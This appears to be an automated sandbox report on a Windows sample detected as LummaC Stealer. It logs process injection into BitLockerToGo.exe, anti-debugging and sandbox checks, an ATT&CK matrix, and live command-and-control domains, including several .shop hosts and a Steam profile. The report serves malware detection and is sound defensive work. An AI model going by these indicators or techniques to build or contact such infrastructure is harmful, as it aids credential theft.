            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: net/addrselect.go
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic file information: File size 41135106 > 1048576
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24d400
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x259a00
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.00000000018AC000.00000004.00001000.00020000.00000000.sdmp
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeStatic PE information: section name: .symtab
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043504B push ss; retf 2_2_0043504F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00441F5C push cs; retf 2_2_00441F64
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2044Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1595472375.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_2-15894
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0043C800 LdrInitializeThunk,2_2_0043C800

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
            LummaC encrypted strings found
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nippydxmnwquo.shop
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C6008Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		311
            Process Injection            		2
            Virtualization/Sandbox Evasion            		OS Credential Dumping11
            Security Software Discovery            		Remote Services1
            Screen Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		311
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager22
            System Information Discovery            		SMB/Windows Admin Shares2
            Clipboard Data            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            locatedblsoqp.shop100%URL Reputationphishing
            caffegclasiqwp.shop100%URL Reputationmalware
            condedqpwqm.shop100%URL Reputationphishing
            millyscroqwp.shop100%URL Reputationmalware
            stamppreewntnq.shop100%URL Reputationphishing
            evoliutwoqm.shop0%URL Reputationsafe
            stagedchheiqwo.shop100%URL Reputationphishing
            traineiwnqo.shop100%URL Reputationmalware

            URLs

            SourceDetectionScannerLabelLink
            https://player.vimeo.com0%URL Reputationsafe
            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
            https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
            https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
            http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
            https://locatedblsoqp.shop/api100%URL Reputationmalware
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
            https://steam.tv/0%URL Reputationsafe
            https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
            http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
            https://store.steampowered.com/points/shop/0%URL Reputationsafe
            https://lv.queniujq.cn0%URL Reputationsafe
            https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
            https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
            https://checkout.steampowered.com/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
            https://store.steampowered.com/;0%URL Reputationsafe
            https://store.steampowered.com/about/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
            https://help.steampowered.com/en/0%URL Reputationsafe
            https://store.steampowered.com/news/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/0%URL Reputationsafe
            http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
            https://recaptcha.net/recaptcha/;0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
            https://store.steampowered.com/stats/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            		104.102.49.254
            		truetrue
              		unknown
              nippydxmnwquo.shop
              		188.114.96.3
              		truetrue
                		unknown
                sergei-esenin.com
                		104.21.53.8
                		truetrue
                  		unknown
                  locatedblsoqp.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown
                  caffegclasiqwp.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown
                  condedqpwqm.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown
                  millyscroqwp.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown
                  stamppreewntnq.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown
                  evoliutwoqm.shop
                  		unknown
                  		unknowntrue
                  • 0%, URL Reputation
                  		unknown
                  stagedchheiqwo.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown
                  traineiwnqo.shop
                  		unknown
                  		unknowntrue
                  • 100%, URL Reputation
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  nippydxmnwquo.shoptrue
                    		unknown
                    https://steamcommunity.com/profiles/76561199724331900true
                    • URL Reputation: malware
                    		unknown
                    https://nippydxmnwquo.shop/apitrue
                      		unknown
                      locatedblsoqp.shoptrue
                        		unknown
                        caffegclasiqwp.shoptrue
                          		unknown
                          millyscroqwp.shoptrue
                            		unknown
                            traineiwnqo.shoptrue
                              		unknown
                              condedqpwqm.shoptrue
                                		unknown
                                stagedchheiqwo.shoptrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://player.vimeo.comBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://caffegclasiqwp.shop/BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5fBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://caffegclasiqwp.shop/wqBitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://microsoftgraph.chinacloudapi.cn/crypto/rsa:SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                              		unknown
                                              https://sergei-esenin.com/BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000059C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://manage.windowsazure.com/publishsettings/indexcrypto/elliptic:SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                  		unknown
                                                  https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://login.sBitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.youtube.comBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
